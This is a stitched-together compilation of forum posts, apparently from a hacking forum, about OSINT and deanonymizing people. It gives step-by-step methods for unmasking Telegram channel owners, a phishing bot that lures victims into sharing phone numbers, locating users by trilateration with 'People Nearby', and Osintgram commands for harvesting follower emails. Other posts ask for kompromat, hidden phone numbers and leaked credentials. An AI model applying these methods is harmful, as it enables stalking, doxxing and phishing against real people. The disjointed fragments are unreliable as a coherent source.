Скажите банальная вещь, а на деле её игнорируют, не замечают. Эта подпись
размещается возле времени публикации, состоит из имени и фамилии аккаунта.
Почему же это можно пропустить? Подпись возможна даже на одной публикации из
всех сотен не подписанных. Внимательно прошерстите все сообщения канала. Вдруг
повезёт встретить имя.
Есть подпись? Ищите упоминания в Telegram и в группе канала.
IV. Репост
Репост это когда сообщение одного канала или пользователя отправлено на другой
канал.
Репост из канала чаще делают подписчики, значит админ и/или владелец подписаны
на канал откуда был репост. Посмотрите есть ли там чат и кто упоминает наш
канал или его контент. Это могут быть фанаты, но больше всего это интересует
админа и/или владельца. Запишите всех кому понравилось упоминание и контент
канала в чате. Будем искать совпадения.
Группа подключена к каналу а может и не быть, это не так важно. Важно сначала убедиться что группа связана с каналом. Это видно на самом канале, там есть ссылка на чат или открыты комментарии к постам.
Как с помощью группы найти владельца канала.
Упоминание изображения приводит к архиву канала или публикациям во вне Telegram. Обратный поиск по изображению такой как Яндекс Картинки — первый источник для проверки упоминаний, после него в топе это Google Images и все остальное.
Имя и адрес канала
Первое что с этим можно сделать это найти их упоминания в сети. Лучше всего
использовать поисковики способные искать в Telegram. Так можно наткнулся на
публикации с покупкой рекламы, админа зазывающего подписаться на канал, репост
администратора и тому подобные упоминания.
А если канал приватный? Посмотрите пункт II. Приватная ссылка.
Как узнать что с канала был удалён пост:
Как их искать:
Найти профиль канала на этих ресурсах также можно по имени и ссылке. По статистике чаще всего удаляют рекламные посты. В них указывают того, кто заплатил за рекламу. Это рекламодатель, можно ему написать, узнать как он разместил свой пост, и с кем для этого договаривался и кому платил.
Не забудь посмотреть пункт публикация, к нему тоже относится удалённый пост.
На самом канале есть информация о том когда и на что было изменено имя этого канала, только обычное приложение Telegram не покажет такое. Нужен Telegram X на Android, скачай и открой его, а в нем перейди на канал.
При создании любого канала надо задать имя. Это будет первое имя, которое всегда останется в первом сообщении канала. Чтобы к нему перейти, можно пролистать до первого поста, но проще сделать ссылку на этот пост. Пример: t.me/durov/1
Не забывайте о том факте, что имя канала может меняться, и все эти изменения
также фиксируются на канале среди публикаций. Если на канале много постов, то
выделите все посты и удалите их, но удалять можно только в альтернативных
клиентах Telegram таких как Bgram. Тогда перед вами останутся системные
сообщения. В том числе и об изменении имени.
Удалять посты канала допускается только если выданы права админа или владелец
канала, такое ограничение ввел клиент Telegram на Android. Чем могут помочь
другие клиенты? В других как раз можно удалять не администраторам. Например в
Bgram
и
Telegraph
можно
перейти к первому сообщению нажав на одну кнопку. Выделите первый, а в конце
канала последней пост, и тогда можно выделить все публикации канала и разом их
удалить. Не бойтесь, посты не удаляются а только скрываются на вашем
устройстве.
Остаются системные сообщения об изменении имени канала. Не забывайте, что первое сообщение с именем канала видно только в Telegram X.
Как использовать эти имена? Смотрите способы для имени канала описанные выше.
Мало что оно дает если нет ссылок. Но даже там указывают контакты которые ведут к админу. Посмотрите описание канала например в tgstat.ru. Tgstat сохраняет описание канала.
К сожалению Tgstat хранит только первые 30 символов описания, но обновляет редко.
Используя способы и ресурсы из этой статьи можно достичь цели и узнать кто администратор и владелец Telegram-канала. Но, нет гарантий того, что эти методы подойдут к каждому Telegram каналу и группе.
Источник
](https://teletype.in/@vtelegrame/nayti_vladelca_telegram_kanala)
Важно понимать, что универсального способа поиска админа и владельца канала нет. Однако можно отдельно выделить рабочие способы...
teletype.in
Автор @vtelegrame
Доброго времени суток, форумчане! Пишу вам с возможно со смехотворным
вопросом, но все же я не технарь и не знаток в айти, поэтому не представляю
полный спектр возможностей в информационной сфере.
Вопрос: можно ли каким-то образом найти человека, который записывал мне
голосовые сообщения со своим голосом? (не изменен ДипВойсом). Если да, то как?
Good day, forum members! I am writing to you with a possibly ridiculous
question, but still I am not a technician and not an expert in IT, so I do not
represent the full range of possibilities in the information sphere.
Question: Is there any way to find the person who recorded to me voice
messages with his voice? (not changed by the DeepVoice or smth else). If so,
how?
Всем привет!
Если кто-то поможет понять это, то буду крайне благодарен)
Как мошенники находят какой-то компромат на человека? Где они берут эту
информацию? Можно ли найти хороший компромат(измена например) на людей с
европы?
Спасибо
Здравствуйте, интересуют способы получения контактных данных сотрудников компаний, офисных клерков, Low-менеджеров, Non- менеджеров, ассистентов и так далее.К примеру мы имеем название и данные компании, как получить контакты их сотрудников? Сервисы вроде Рокетрич, зуминфо и так далее не рассматриваем, есть в наличии, они грешат своей "валидностью" конкретно номеров, нам нужны 100% данные.
MetaOSINT enables open source intelligence ("OSINT") practitioners to jumpstart their investigations by quickly identifying relevant, publicly- available tools and resources, saving valuable time during investigations, research, and analysis.
metaosint.github.io
del
Существуют ли сервисы, которые позволяют пробить зарубежный айпи на
наличие юзернеймов, почт, паролей в каких либо слитых базах данных? Допускаю,
что такая информация не будет точной, тк провайдеры используют динамические
адреса.
На просторах СНГ существует глаз бога, который порой может предоставить такую
информацию, но у сервиса нет забугор баз. Существуют ли аналоги?
Все мы знаем как можно легко и просто найти пользователя Телеграм по "username" или Telegram ID, иногда можно найти зацепки через аватар. Однако, возможна ситуация когда необходимо найти юзера без подобных данных, а в наличии только никнейм. Какие методы вы используете?
Если представить себе ситуацию что никнейм пользователя состоит из одного
слова, к примеру - "cabbage".
1. Я рассматривал подход с помощью глобального поиска по никнейму, но чаще
попадаются содержащие данное слово, нет возможности ранжирования.
2. Использование Google Dorks или поисковых систем даёт слишком большой объём
нерелевантных данных, которые пытаешься отфильтровать, но, увы, не получается
выудить именно то, что надо.
3. ГБ, Snoop Project и прочие поисковые инструменты в качестве входных данных
используют тот же "username"/tg_id, нежели никнейм
пользователя.
Так как сейчас больше осваиваю Telegram OSINT, дабы положить в копилку к
остальным навыкам в данной дисциплине, прошу не кидаться помидорами, если
вопрос с ответом на поверхности.
Всем peace
Всем привет,
Искал по OSINT-фреймворку, но там нет информации. Всего нашел два сайта, где можно смотреть статистику и определять, является ли номер скамом.
Заранее спасибо!
помогите, как найти аккаунты?
Как узнать номер telegram аккаунта если он скрыт? Знаю ID аккаунта, номер скрыт, пользователь давно не заходит в телегу остался не решённый вопрос поэтому хотел достать его номер, также есть фото данного пользователя
Первая тема,строго не судите!
Возможно кому-то пригодится.
Не в коем случае не реклама!!
Venator - многофункциональный OSINT браузер на базе Librewolf.
OSINT: Maltego, Hunchly, Vortimo, Venator OSINT Browser, Aurora Incident
Response , Cronos , SpiderFoot
Forensic:Ghidra, IDA
Security : SPN (Portmaster), Wireshark, VeraCrypt, KeePassXC ,
MullvadVPN ,Торификация трафика, Keystroke Antideanon (Kloak), Подмена MAC-
адреса, Noisy, OnionShare
Click to expand...
__СКАЧАТЬ:
Яндекс Диск
Google
Drive
ProtonDrive
AnonFiles
Code:Copy to clipboard
CRYPTOCURRENCY
==============================================================
Monero - anonymous money
Official website: https://www[.]getmonero[.]org/
Wallet: https://www[.]getmonero[.]org/downloads/
Monitoring of exchangers: https://www[.]bestchange[.]ru/
Anonymous exchanger inside TOR: http://aa7oyok6dxgyedeteldaumqjernm5ai7dnpqayy3p4q7solc6dxi5vad[.]onion/
Anonymous exchanger inside TOR2: http://eludemailxhnqzfmxehy3bk5guyhlxbunfyhkcksv4gvx6d3wcf6smad[.]onion/
Monero Crypto ATM Map: http://xmrguide42y34onq[.]onion/atms
Domains for Monero: http://njallalafimoej5i4eg7vlnqjvmb6zhdh27qxcatdn647jtwwwui3nad[.]onion/
SOFTWARES
==============================================================
1. OnionCat → (https://www[.]onioncat[.]org/) ← a fairly high-quality anonymous VPN adapter[.] With it, you can connect two or more devices through VPN tunnels
2. Tribler → (https://www[.]tribler[.]org/download[.]html) ← With this torrent client you can download files through a chain of intermediary servers Something similar to the Tor network
3. PSIPHON → (https://www[.]psiphon3[.]com/) ← is a very comprehensive tool designed to bypass Internet censorship
4. Orchid → (https://www[.]orchid[.]com/) ← reliable new generation VPN service[.] It uses blockchain technology and smart contracts
5. Lantern → (https://getlantern[.]org/ru_RU/index[.]html) ← a pool of various proxies to bypass Internet censorship
6. Censor Tracker → (https://censortracker[.]org/) ← extension for Chrome, which allows you to bypass Internet censorship in the Russian Federation
7. SnowFlake → (https://support[.]torproject[.]org/ru/censorship/how-can-i-use-snowflake/) ← Tor bridge that works right in your browser
8. Magic Wormhole → (https://magic-wormhole[.]readthedocs[.]io/en/latest/) ← A handy utility for transferring files between devices directly
9. FireChat → (https://firechat[.]en[.]uptodown[.]com/android) ← an interesting offline messenger
NETWORK
==============================================================
Anonymity Script- https://github[.]com/HiroshiManRise/anonym8
General router DNS setup(recommended) - http://support[.]smartdnsproxy[.]com/customer/portal/articles/1558303-general-router-dns-setup-smart-dns-proxy
Alternate DNS - https://wikileaks[.]org/wiki/Alternative_DNS/de
FILE SHARING
==============================================================
1[.] Download & Install https://onionshare[.]org
2[.] Press Connect with TOR Button
3[.] Drag & Drop all Files you want to upload in the field
4[.] Wait some time
5[.] You'll get an [.]onion url aswell as an private key[.]
6[.] Provide User's with the link and the Provate key aswell as the download link for the tor browser[.]
Note, after you shared the File, you can stop file sharing at any time within OnionShare Application This is useful if you for example want only 1 person to download it or if your link and private key got exposed to Users who shouldn't be able to download it
antiviruses
– http://fuckingscan[.]me/
– http://v2[.]scan[.]majyx[.]net/
– http://nodistribute[.]com/
– http://www[.]file2scan[.]net/
– http://anubis[.]iseclab[.]org/
– https://anonscanner[.]com/
– http://virusscan[.]jotti[.]org/it
– https://www[.]virustotal[.]com/nl/
==============================================================
http://www[.]microsystools[.]com/products/website-download - Download entire websites to disk[.]
http://www[.]httrack[.]com/ - Allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer
100 TOOLS
1. Autopsy - Open source digital forensics platform to analyze hard drives and smart phones https://www.autopsy.com
2. EnCase - Commercial computer forensics software for e-discovery and investigations by OpenText https://www.opentext.com/products-and-solutions/products/software/encase-platform
3. AccessData (FTK) - Forensic toolkit computer investigation software by AccessData https://accessdata.com/products-services/forensic-toolkit-ftk
4. X-Ways Forensics - Integrated computer forensics software by X-Ways Software Technology http://www.x- ways.net/forensics/
5. Sleuth Kit - Open source digital forensics tools for analyzing disk images and file systems https://www.sleuthkit.org
6. Volatility - Memory forensics framework to analyze volatile memory dumps and artifacts https://www.volatilityfoundation.org/
7. Wireshark - Network protocol analyzer useful for network forensics and traffic analysis https://www.wireshark.org
8. Cellebrite UFED - Commercial mobile forensic software to extract data from phones and tablets https://www.cellebrite.com/en/ufed-ultimate/
9. Email Collector - Tool to collect and analyze email data during investigations https://www.accessdata.com/products-services/e-discovery/email-examination/ftk-email-collector
10. Forensics (DFF) - Digital forensics framework, an open source platform for investigations https://github.com/arxsys/dff
11. Magnet AXIOM - Commercial digital investigations platform from Magnet Forensics https://www.magnetforensics.com/products/magnet-axiom/
12. Oxygen Detective - Cloud extraction tool for investigations involving cloud services https://www.oxygen- forensic.com/en/oxygen-detective
13. OSForensics - Specialized forensics tools for Microsoft systems from PassMark https://www.osforensics.com/
14. NetworkMiner - Open source network forensic analyzer useful for investigating traffic http://www.netresec.com/?page=NetworkMiner
15. RegRipper - Tool to parse Windows registry files and dig for useful data https://github.com/keydet89/RegRipper3.0
16. Bulk Extractor - Scans disk images and extract interesting bits of data https://github.com/simsong/bulk_extractor
17. Ghiro - Web site screenshots and analysis for forensic investigations http://www.getghiro.org/
18. Scalpel - File carver which recovers files based on headers and footers http://www.digitalforensicssolutions.com/Scalpel/
19. HxD - Hex editor useful for analyzing raw disk and memory dumps https://mh-nexus.de/en/hxd/
20. TestDisk - Data recovery tool, useful when file systems get corrupted https://www.cgsecurity.org/wiki/TestDisk
21. PhotoRec - Recovery tool specifically focused on photos and media files https://www.cgsecurity.org/wiki/PhotoRec
22. CAINE - Italian GNU/Linux live distribution with many forensics tools https://www.caine-live.net
23. Axiom Cyber - Commercial digital forensics and incident response platform https://axiomcyber.com/axiom-cyber/
24. Belkasoft Evidence - Commercial all-in-one forensics solution for Windows, mobile etc https://belkasoft.com/evidence
25. Fibratus - Tool to explore and trace Windows kernel activity and data https://www.jpcert.or.jp/english/pub/sr/ir_research.html
26. Autopsy Browser - GUI interface for autopsy digital forensics platform https://www.autopsy.com/browser/
27. Kali Linux - Penetration testing Linux distribution with many useful security tools https://www.kali.org 28. DEFT - Linux distribution configured specifically for computer forensics http://www.deftlinux.net
29. Volatility Framework - Advanced memory forensics framework with plugins and APIs https://www.volatilityfoundation.org/
30. PyFlag - Legacy Australian forensic and log analysis GUI platform http://www.pyflag.net
100 Free Security Tools
For ethical hackers and forensic investigators
31. Plaso (log2timeline) - Extract timestamps from various logs and aggregate timeline https://plaso.readthedocs.io/en/latest/sources/user/log2timeline.html
32. TSK (The Sleuth Kit) - File system and disk analysis tools originally focussed on NTFS https://www.sleuthkit.org/sleuthkit/
33. Redline - Host investigations and malware analysis tool by FireEye https://www.fireeye.com/services/freeware/redline.html
34. Snort - Open source intrusion detection and network monitoring system https://www.snort.org
35. Tcpdump - Capture and analyze network traffic on Unix-like systems https://www.tcpdump.org
36. Ngrep - Search within network traffic payloads like grep for text streams http://ngrep.sourceforge.net/ 37. dcfldd - Disk cloning and forensics tool, version of dd with hashing https://dcfldd.sourceforge.net/
38. Wireshark - Network traffic analyzer useful for network forensics https://www.wireshark.org
39. SIFT (SANS) - Ubuntu-based distribution for forensic analysis https://digital- forensics.sans.org/community/downloads
40. Paladin - USB image mounted as virtual drive with write-protection https://sumuri.com/software/paladin/
41. CAINE Live - Self-contained bootable forensic environment https://www.caine-live.net/page5/page5.html 42. XRY (XAMN) - Commercial mobile forensic software to analyze phones https://msab.com/xry/
43. BlackLight - Powerful Windows-based forensics analysis platform https://www.blackbagtech.com/blacklight.html
44. WinHex - Hex editor, particularly helpful for low-level analyzing raw data https://www.x- ways.net/winhex/
45. Access FTK Imager - Disk and volume imaging software from AccessData https://accessdata.com/product- download
46. DC3DD - Improved version of dd for forensics, handles errors better https://github.com/Defense-Cyber- Crime-Center/DC3-DD
47. Raptor - Validation tool to verify integrity of forensic copies http://forensic.rampar.net/
48. EnCase Imager - Disk imaging tool from Guidance Software https://www.guidancesoftware.com/encase- imager
49. Guymager - Open source disk cloning and imaging tool for Linux https://guymager.sourceforge.io
50. Scalpel - File carver recovering files based on header/footer signatures http://www.digitalforensicssolutions.com/Scalpel/
51. Extundelete - Used to recover deleted files from mountable images http://extundelete.sourceforge.net/ 52. Xplico - Network forensics tool that rebuilds sessions from traffic http://www.xplico.org/
53. Foremost - File carving utility to recover files using header/footer definitions http://foremost.sourceforge.net
54. Hunchback - High speed packet capture and transmission tool https://hunchback.sourceforge.net/
55. Autopsy Tools - Plugins and tools used alongside Autopsy forensics GUI https://www.autopsy.com/extend-autopsy/
56. OSForensics Imager - Hardware write block tool for connecting devices https://www.osforensics.com/tools/write-blockers.html
57. Dislocker - Decrypts Bitlocker encrypted volumes with mounted filesystem https://github.com/Aorimn/dislocker
58. Bulk Extractor - Extract forensically interesting information from disk images https://github.com/simsong/bulk_extractor
59. SANS SIFT - Ubuntu-derived distro for digital forensic analysis https://digital- forensics.sans.org/community/downloads
60. Live View - Volatile memory analysis tool for Windows systems http://liveview.sourceforge.net/
61. LRR - Tool for viewing Windows artifacts including LNK files https://github.com/EricZimmerman/LinkRunner
62. NTFS-3G - Open source cross-platform NTFS driver with write support https://www.tuxera.com/community/open-source-ntfs-3g/
63. WindowsSCOPE - Registry analysis tool for dumped SYSTEM/SAM/SECURITY hives http://www.windowsscope.com/
64. Volafax - Forensic system suited for investigations over remote areas https://github.com/jipegit/FlaxVolafox
100 Free Security Tools
For ethical hackers and forensic investigators
65. Amcache Parser - Recovers data from Windows 10 Amcache.hve artifact file https://tzworks.net/prototype_page.php?proto_id=11
66. The Hive - Web interface offering querying capabilities for hive files https://thehive-project.org
67. GRR Rapid Response - Incident response framework focused on remote live forensics https://github.com/google/grr
68. Rekall - Advanced forensic memory analysis framework powered by Python http://www.rekall- forensic.com/
69. DFF - Open source digital forensics framework and platform written in Python https://github.com/arxsys/dff
70. SSDeep - Fuzzy hashing tool used for malware clustering and piecewise comparisons https://ssdeep- project.github.io/ssdeep/index.html
71. KAPE - Target acquisition tool focused on enterprise lines of business https://www.krollartifactparser.com/ 72. USB Write Blocker - Hardware ensuring write protection when imaging USB devices
73. AIL - Network and host monitoring system for identification of intrusions https://www.cert.org/incident- management/products-services/ail.cfm
74. Rifiuti2 - Analyzes Windows Recycle Bin INFO2 files and recovers filenames https://github.com/abelcheung/rifiuti2
75. VolDiff - Compares memory images and highlights differences for analysis https://github.com/aim4r/VolDiff 76. WinAudit - Scans Windows systems and reports changes from baseline http://www.winaudit.com/
77. hfind - Carves unallocated space and extracts hidden/deleted data into files https://www.mcafee.com/enterprise/en-us/downloads/free-tools/hfind.html
78. Yara - Pattern matching tool aimed at malware researchers
79. Checkm8 - Jailbreaking tool extracting data from passcode locked iOS devices https://checkm8.info/
80. Olefile - Python package for parsing OLE and Office documents https://github.com/decalage2/olefile
81. Pyew - Python tool for malware analysis static and dynamic https://github.com/joxeankoret/pyew
82. E01 Examiner - Software utility for mounting EnCase evidence file formats https://e01examiner.com/
83. USBDeview - Handy Windows tool listing all USB devices ever connected https://www.nirsoft.net/utils/usb_devices_view.html
84. Autopsy - iPhone - Autopsy module adds iOS analysis functionality https://sleuthkit.org/autopsy/plugins.php
85. DC3-MWCP - Collection of tools for forensic enterprise analysis from DC3 https://www.dc3.mil/software- catalog/
86. X-Ways Imager - Disc imaging tool to create forensic images, integrated into X-Ways Forensics http://www.x-ways.net/imager/index-m.html
87. Memoryze - Memory acquisition and analysis tool for Windows systems https://www.fireeye.com/services/freeware/memoryze.html
88. EVTExtract - Automated parsing modules for Windows event log records https://evtxtract.readthedocs.io/en/latest/
89. Speedit - Detection and analysis of spyware, keyloggers, trojans etc https://www.komodia.com/speedit-sdk 90. SniffPass - Sniffs passwords and other sensitive information from a network http://www.komodia.com/sniffpass
91. Nmap - Network scanning and host discovery tool helpful for reconnaissance https://nmap.org/
92. OSINT Framework - Gathering publicly available online data regarding targets https://osintframework.com/ 93. Recon-ng - Web based open source reconnaissance framework https://github.com/lanmaster53/recon-ng 94. OSINT-SPY - Performs extensive reconnaissance using 300+ OSINT data sources https://github.com/SharadKumar97/OSINT-SPY
95. Shodan - Search engine for Internet connected devices https://www.shodan.io
96. Maltego - Link analysis and data mining for gathering information https://www.maltego.com/
97. SpiderFoot - OSINT automation tool gathering threat intelligence data https://www.spiderfoot.net/
98. Metagoofil - Extract metadata of public documents from a target website https://github.com/laramies/metagoofil
99. TheHarvester - Gather emails, names, URLs from different public sources https://github.com/laramies/theHarvester
100. Creepy - Geolocation OSINT tool to extract target location information from social media profiles https://www.geocreepy.com/
Telegram только кажется анонимным. На деле существует множество методик и инструментов для деанонимизации пользователей мессенджера, и именно о них пойдет речь в статье. Мы рассмотрим боты‑ловушки, использование специальных сервисов, а также другие методики.
Для использования этого способа деанонимизации потребуется немного социальной
инженерии. Методика работает по принципу фишинга: жертва заходит в бота, и для
дальнейшего его использования запрашивается отправка номера телефона (это
встроенная функция мессенджера). Далее, в зависимости от фантазии создателя,
бот либо игнорирует сообщения, либо выполняет какие‑то полезные функции, но
главное — владелец робота получает номер пользователя.
Самое интересное, что у тебя нет ни малейшей необходимости писать с нуля
собственного бота, потому что есть уже готовые решения. Например,
@protestchat_bot или
@Checknumb_bot.
Результат можно получить, введя ID целевого аккаунта у бота @TgAnalyst_bot.
Здесь же можно проверить ID по базе, собранной тем же методом другими пользователями и основателями проекта.
Однако лучше, конечно, написать бота самостоятельно, но и для этого есть наработки — репозитории на GitHub. Ими можно воспользоваться без редактуры, они позволят сразу создать несколько полноценных ботов «из коробки». При этом ты можешь выбрать из нескольких тематических вариантов бота: накрутка подписчиков в инстаграме, онлайн‑знакомства, донат в компьютерную игру и поиск информации по номеру телефона.
Но помни, что основная задача — все‑таки заставить пользователя поделиться номером, поэтому действие это должно быть мотивировано. А мотивацию мы выбираем индивидуально под каждую цель, значит, и тематика бота, скорее всего, будет разной. Кто‑то поделится номером ради оценки подержанного автомобиля, кто‑то — чтобы найти интересный фильм, кого‑то заинтересует скачивание видео с YouTube. Поэтому ботов придется создавать разных под каждый кейс, а основной код можно скопировать из упомянутых репозиториев.
В 2019 году в Telegram появилась новая функция — «Люди рядом». Она позволяет
пользователям делиться своим местоположением, чтобы находить контакты и чаты
поблизости. Затем определение точного местоположения убрали, однако локацию в
радиусе 500 метров можно передавать до сих пор.
Конечно, OSINT-специалисты такую интересную возможность не упустили и создали
несколько инструментов для эксплуатации фичи. Работают они следующим образом.
На рабочем аккаунте включается функция «Люди рядом» и задаются те координаты, в которых предположительно находится цель. Каждые 25 секунд всем ближайшим к указанной точке пользователям будет отправляться TDLib из Telegram. В него входит расстояние каждого ближайшего пользователя до твоего местоположения. Используя три расстояния от трех разных точек, можно вычислить местоположение ближайшего пользователя.
При этом будут найдены только те пользователи Telegram, у которых активирована функция «поблизости». По умолчанию она отключена. И конечно, для начала тебе необходимо иметь хотя бы примерное представление о местонахождении объекта твоего интереса. Можно повторять поиск в нескольких местах, если исходная область слишком большая.
Подобных сервисов я нашел три, принцип работы у них одинаковый:
В прошлой статье я уже писал про поисковики, способные искать в чатах и каналах Telegram. В них можно вбить юзернейм, никнейм или ID цели: возможно, эти идентификаторы где‑то упоминались и мы получим дополнительную информацию. Так как база источников у этих сервисов разная, имеет смысл поискать в каждом. Поэтому я решил дополнить этот список.
Есть и поисковики, созданные энтузиастами на базе возможностей Google. Ищут они по определенным ресурсам «Телеграма», где содержатся сообщения и публикации:
Теперь перейдем к другому аспекту телеграм‑расследований — деанонимизации владельцев телеграм‑каналов. Нередки случаи, когда автор канала публикует в постах, описании или заголовке определенную информацию, касающуюся его личной жизни. В общем, любые сведения, которые могут помочь в расследовании. Позже он удаляет ее по причине, например, переориентации канала, а может, сведения и вовсе были опубликованы случайно.
Поэтому у исследователя должны быть инструменты, сохраняющие контент каналов и предоставляющие доступ к копиям. В некоторых случаях ему помогут всем известные онлайн‑архивы:
Также стоит посмотреть в кешированных копиях. Кроме того, есть и решения, ориентированные конкретно на Telegram. Например, сайт Tgstat позволяет смотреть историю названий, описаний, ссылок и ленты канала. Невероятно полезный инструмент.
Если в Tgstat не нашлось ничего интересного, можно пролистать ленту постов в альтернативных сервисах:
Если ты пользуешься стикерами в Telegram, знай, что в каждом стикере содержится ID автора. Думаю, ты замечал, что многие каналы создают фирменные стикерпаки. Имея в распоряжении стикерпак, мы можем из кода элемента узнать ID его создателя. Процесс извлечения автоматизирован в боте @SPOwnerBot, просто перешли ему стикер.
Полученный ID необязательно будет принадлежать владельцу канала или его знакомому, возможно, стикерпак заказали у стороннего дизайнера — это нужно учитывать.
Ну и напоследок — еще одна интересная фича. Метод актуален в том случае, если у нас есть ссылка на приватный канал, в который нет возможности вступить. Тогда единственное, что у нас имеется, — это предпросмотр в браузере.
Однако Telegram часто скрывает часть описания канала, которая может содержать полезные сведения. То есть в режиме предварительного просмотра ты будешь видеть неполное описание канала. Однако на самом деле информация там представлена полностью, но скрыта в коде элемента. Чтобы ее увидеть:
Code:Copy to clipboard
body > div.tgme_page_wrap > div.tgme_body_wrap > div > div.tgme_page_description
Этот элемент содержит полное описание канала, в отличие от пользовательского
варианта.
Перечисленные методы открывают интересные возможности для деанонимизации пользователей и каналов, однако главное — помнить: сбор информации о физических лицах незаконен, будь осторожен при работе с персональными данными и не используй полученные сведения во вред.
Автор: @Ильдар Кудашев
Источник: t.me/Digitalntelligence
I've seen some posts about differences between the different OSINT search
engines that scan the internet (eg. Shodan, Zoomeye, Censys, etc).
Basically, most of them talk about the differences in port coverage or
detected technologies, which is definitely an important element to think
about.
But nobody talks about the differences in the quality of the results or the
ease of use in these systems.
There are a lot of services and types of services to cover when scanning the entire internet, but in my opinion, there are really not that much that can be abused to gain profit from.
Most apps that are valuable and relevant, use the same ports:
Web apps mostly use 80, 443, 8080, 8443, 3443, 8000
Mail services use 110, 143, 993, 995, 25, 587, 465
VPN services use 1194, 443, 500, 1723
FTP uses 20 and 21
SSH uses 22
DNS use 53
SQL Servers ports 1433, 3306, 5432, 27017, 27018, 1521, 6379
Windows services (that are sometimes open to the internet) mostly are 445,
137, 139, 135, 3389
There are also lots of other programs with default ports of their own (like
cPanel, some AV servers, and SCADA devices).
But these are the general ports that are relevant (imo) in the context of
cyber security and are not just random SIP or IOT devices.
ALL OF THESE LISTED PORTS are being scanned by Shodan, Zoomeye, Fofa, Criminal
IP, and Censys.
So what's the difference between them???
The frequencies
Some of them scan a specific port once a day, some scan it once a week, and
some may scan it somewhere in between.
It really differs depending on the specified port.
I can't put my finger myself on the frequencies regarding which service scans
which port at what frequencies - and I'm sure it changes a lot over time.
You can refer to "A Survey on Cyberspace Search Engines" -
https://link.springer.com/chapter/10.1007/978-981-33-4922-3_15 for more
details about the frequencies.
The query language
So FOFA, Zoomeye & Censys have their own query language where you can use AND,
OR and NOT (in some cases).
Shodan and Criminal IP do not. It really affects the quality of life when
using these kinds of systems.
If for example, I want to perform a scan of a technology based on a couple of
parameters: favicon and Title.
To find all services that use the favicon or the title - In Shodan\Criminal IP
I'll have to use 2 queries (that most likely will cost me more quota than I
need because of duplicates), And in Zoomeye\Fofa\Censys I can use 1 query to
find the services and without spending double the quota on duplicates.
It is also way more comfortable to use 1 query instead of multiple.
The API and general use
Censys recently updated their license program. In most search engines
(Zoomeye, Fofa, Shodan, Criminal IP) you have a quota that you can use however
you like.
But in Censys - you can't. You can get a maximum of 5,000 results per search
(for the 500$ monthly plan).
Kind of strange but it's a problem we need to address regarding this search
engine.
Criminal IP is shit
It's shit.
I hate it.
It has some weird bugs here and there and I hate to use it.
The UNKNOWN factor (Firewall DROPs)
So far we discussed the technical details of the scaners\search engines.
There is one last element to be addressed and it's regarding the amount of
results we get for a specific service\port.
Let's take HTTP\80 in the United States as an example:
Fofa has 105M unique IPs
Zoomeye has 60M unique IPs
Censys has 53M unique IPs
Shodan has 42M unique IPs
Criminal IP has 20M unique IPs
The reason for the dramatic difference is because of FW DROPS. When you scan
the entire internet, it's easy to get blocked by lots of FWs and ISPs.
It can be a really difficult thing to maintain a network of scan devices that
won't get blocked all the time.
Some scanners\search engines are performing better than others, but the most
important thing to note is that it's always beneficial to use multiple
scanners\search engines to get the most results.
Some targets I found on Shodan that haven't been found on any of the other
scanners.
And I can say the same about them all, each of them can find devices\services
that the others didn't manage to access because of this issue (Even Criminal
IP which is a piece of shit).
Tools and utils
https://transl8.watchdawg.io/ - is a very useful site to help you write
queries to the different search engines according to their syntax.
https://github.com/cipher387/awesome-ip-search-engines - contains a lot of
useful info in it (articles, cheatsheets, Tools, etc)
Hope I helped you understand this world a little better.
If you have better ways to scan the internet, or some general thoughts
regarding this topic, feel free to discuss them in the comments or contact me
in pm.
I'm looking for a business partner to scan the internet with me, if you have
more results than the search engines, contact me in pm.
im wondering which one would be the best to use i know its probably IntelX but
i would like a cheaper alternative
Мне интересно, какой из них лучше всего использовать. Я знаю, что это,
вероятно, IntelX, но мне бы хотелось более дешевую альтернативу
I tried to use temp mails, fake numbers, etc but Meta always catch me and
block/delete my accounts.
What are the best ways to make a strong and undetectable account?
I appreciate the feedback
У многих организаций есть учетные записи Instagram, которые обычно используются в маркетинге или для связи с пользователями. Частью этих подписчиков могут быть работники самой компании, а нам, как этичным хакерам, в рамках OSINT, получить информацию о них, во время пентеста, было бы очень полезно. В этой статье я покажу, как с помощью Osintgram на Kali Linux, получить данные пользователей Instagram.
Для Kali Linux eсть классный инструмент, известный как Osintgram, который позволяет с легкостью собирать данные в Instagram.
Для использования Osintgram необходимо иметь учетную запись пользователя Instagram (не используйте свой личный аккаунт!). Эта учетная запись необходима для авторизации в Instagram с помощью инструмента Osintgram.
В Kali Linux откройте терминал и по очереди выполните команды:
Code:Copy to clipboard
kali@kali:~$ git clone https://github.com/Datalux/Osintgram.git
kali@kali:~$ sudo apt-get install python3-venv
Выполнение команд скачает Osintgram из репозитория GitHub и установит Python3 в Kali Linux.
Создайте виртуальную среду Python3 и установите зависимости Osintgram:
Code:Copy to clipboard
kali@kali:~$ cd Osintgram
kali@kali:~/Osintgram$ sudo python3 -m venv venv
kali@kali:~/Osintgram$ source venv/bin/activate
kali@kali:~/Osintgram$ sudo pip3 install -r requirements.txt
Используйте следующую команду, чтобы ввести учетные данные пользователя Instagram для Osintgram:
Code:Copy to clipboard
kali@kali:~/Osintgram$ make setup
При вводе пароля он остается невидимым в целях безопасности:
Для примера, попробуем собрать информацию с официальную страницы Microsoft в
Instagram:
Code:Copy to clipboard
kali@kali:~/Osintgram$ sudo python3 main.py Microsoft
Чтобы просмотреть список доступных команд, используйте команду list :
Code:Copy to clipboard
Run a command: list
Чтобы собрать информацию о пользователе Instagram:
Code:Copy to clipboard
info
Чтобы собрать адреса электронной почты подписчиков страницы:
Code:Copy to clipboard
fwersemail
Чтобы получить изображение профиля страницы, используйте команду:
Code:Copy to clipboard
propic
Все параметры Osintgram:
Чтобы просмотреть собранные данные, введите exit и нажмите Enter.
Все собранные данные сохраняются в выходной папке. Чтобы просмотреть содержимое файлов в папке, используйте команду:
Code:Copy to clipboard
ls output
Сбор списка подписчиков и их адресов электронной почты может занять много времени в зависимости от количества подписчиков целевой страницы в Instagram. Однако, как только эти данные будут собраны, вы сможете с легкостью отфильтровать данные.
На этом все. Теперь вы знаете, как с помощью Osintgram на Kali Linux, получить данные пользователей Instagram.
Crosslinked - это мощный скрипт на Python для облегчения процесса парсинга имен сотрудников компаний из LinkedIn без использования API или прямого доступа к сайту. Это бесценный инструмент для сбора данных о сотрудниках компаний с возможностью автоматизации ваших действий для более эффективного достижения конечных целей.
